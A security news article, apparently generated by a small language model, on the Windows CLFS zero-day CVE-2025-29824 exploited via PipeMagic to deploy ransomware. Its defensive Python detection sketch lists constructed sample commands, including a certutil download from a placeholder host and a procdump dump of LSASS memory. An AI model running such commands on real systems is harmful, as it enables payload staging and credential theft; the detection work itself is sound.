Ethical Hacking News
The Microsoft report revealed a newly discovered security flaw (CVE-2025-29824) in the Windows Common Log File System (CLFS) that was exploited as a zero-day in ransomware attacks. The vulnerability is a privilege escalation bug in CLFS that could be exploited to achieve SYSTEM privileges. The targets of these attacks include organizations in the IT, real estate, financial, software, and retail sectors in several countries. The threat actors used a malware named PipeMagic to deliver the exploit and ransomware payloads, likely staged via the certutil utility from a compromised third-party site. The malware is a malicious MSBuild file that contains an encrypted payload, which is unpacked to launch PipeMagic, a plugin-based trojan. The exploit abuses a memory corruption bug in the CLFS kernel driver and allows for process injection into SYSTEM processes. Successful exploitation was followed by theft of user credentials and encryption of files with a random extension, leading to ransomware deployment.
PipeMagic Trojan Exploits Windows Zero-Day Vulnerability to Deploy Ransomware
A recent report by Microsoft has revealed that a newly discovered security flaw in the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets. The vulnerability, identified as CVE-2025-29824, is a privilege escalation bug in CLFS that could be exploited to achieve SYSTEM privileges.
The targets of these malicious attacks include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia. Microsoft has stated that it is tracking the activity and post-compromise exploitation of CVE-2025-29824 under the moniker Storm-2460.
The threat actors involved in these attacks are using a malware named PipeMagic to deliver the exploit as well as ransomware payloads. The exact initial access vector used in the attacks is currently not known, but it has been observed that the threat actors have been using the certutil utility to download malware from a legitimate third-party site that was previously compromised to stage the payloads.
The malware is a malicious MSBuild file that contains an encrypted payload, which is then unpacked to launch PipeMagic, a plugin-based trojan that has been detected in the wild since 2022. This is not the first time that PipeMagic has been linked to ransomware attacks; previously, it was also observed in connection with Nokoyawa ransomware attacks that exploited another CLFS zero-day flaw (CVE-2023-28252).
In some of the other attacks attributed to the same actor, victims' machines were infected with a custom modular backdoor named 'PipeMagic' that is launched via an MSBuild script. Windows 11, version 24H2, is not affected by this specific exploitation, as access to certain System Information Classes within NtQuerySystemInformation is restricted to users with SeDebugPrivilege, which typically only admin-like users can obtain.
The exploit targets a vulnerability in the CLFS kernel driver. It uses a memory corruption bug together with the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF, enabling all privileges for the process and allowing it to inject into SYSTEM processes.
Successful exploitation is followed by the threat actor extracting user credentials by dumping the memory of LSASS and encrypting files on the system with a random extension. Microsoft stated that it was unable to obtain a ransomware sample for analysis but said that the ransom note dropped after encryption included a TOR domain tied to the RansomEXX ransomware family.
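The staging steps described above (certutil fetching the payload, MSBuild launching it) and the LSASS memory dump that followed exploitation all leave traces in process-creation telemetry. As an added example that is not from the Microsoft report or this article, the following Python sketch applies three corresponding detection rules to constructed sample events; the event field layout, the allow-list of legitimate MSBuild parents, and the set of user-writable paths are assumptions for the example.

```python
import re

# Constructed process-creation events (parent image, image, command line) that
# imitate EDR or Sysmon Event ID 1 records; they are not from the report.
SAMPLE_EVENTS = [
    ("cmd.exe", "certutil.exe",
     "certutil.exe -urlcache -split -f http://staging.example.invalid/s.proj C:\\Users\\Public\\s.proj"),
    ("explorer.exe", "certutil.exe", "certutil.exe -verify C:\\certs\\corp.cer"),
    ("cmd.exe", "MSBuild.exe", "MSBuild.exe C:\\Users\\Public\\s.proj"),
    ("devenv.exe", "MSBuild.exe", "MSBuild.exe C:\\src\\app\\app.csproj /t:Build"),
    ("cmd.exe", "procdump.exe", "procdump.exe -ma lsass.exe C:\\Windows\\Temp\\l.dmp"),
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Locations a standard user can write to; a build script staged here is suspect (assumed list).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Parents from which MSBuild normally runs during legitimate builds (assumed allow-list).
BUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}


def classify(parent, image, cmdline):
    """Return the detection labels that apply to one process-creation event."""
    findings = []
    img, cmd = image.lower(), cmdline.lower()
    # Rule 1: certutil fetching a remote resource, the staging step the report describes.
    if img == "certutil.exe" and "-urlcache" in cmd and URL_RE.search(cmd):
        findings.append("certutil remote download")
    # Rule 2: MSBuild running a project file from a user-writable path outside a
    # normal build tool chain, matching how PipeMagic is launched.
    if (img == "msbuild.exe" and parent.lower() not in BUILD_PARENTS
            and any(p in cmd for p in USER_WRITABLE)):
        findings.append("msbuild from user-writable path")
    # Rule 3: a process other than LSASS naming lsass on its command line (credential dumping).
    if img != "lsass.exe" and "lsass" in cmd:
        findings.append("lsass targeted")
    return findings


def scan(events):
    """Return (image, command line, findings) for every event that triggers a rule."""
    hits = []
    for parent, image, cmdline in events:
        findings = classify(parent, image, cmdline)
        if findings:
            hits.append((image, cmdline, findings))
    return hits


if __name__ == "__main__":
    for image, cmdline, findings in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(findings)}\n    {cmdline}")
```

Each rule alone produces noise in a build-heavy environment; the value is in correlating them on one host within a short window, which is what the chain in this report would look like.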
The vulnerability in question, CVE-2025-29824, highlights the growing concern over zero-day vulnerabilities being exploited by threat actors to deploy ransomware. This attack demonstrates how attackers can leverage privilege escalation bugs to achieve widespread deployment and detonation of ransomware within an environment.
Ransomware threat actors value post-compromise elevation of privilege exploits because these could enable them to escalate initial access, including handoffs from commodity malware distributors, into privileged access. They then use privileged access for widespread deployment and detonation of ransomware within an environment.
In conclusion, the discovery of this new vulnerability highlights the importance of timely patching and vigilance in cybersecurity. As threat actors continue to evolve their tactics, it is crucial for organizations to remain proactive in protecting themselves against emerging threats like PipeMagic Trojan and its associated ransomware payloads.
Related Information:
https://www.ethicalhackingnews.com/articles/PipeMagic-Trojan-Exploits-Windows-Zero-Day-Vulnerability-to-Deploy-Ransomware-A-Growing-Concern-for-Cybersecurity-ehn.shtml
Published: Wed Apr 9 05:03:33 2025 by llama3.2 3B Q4_K_M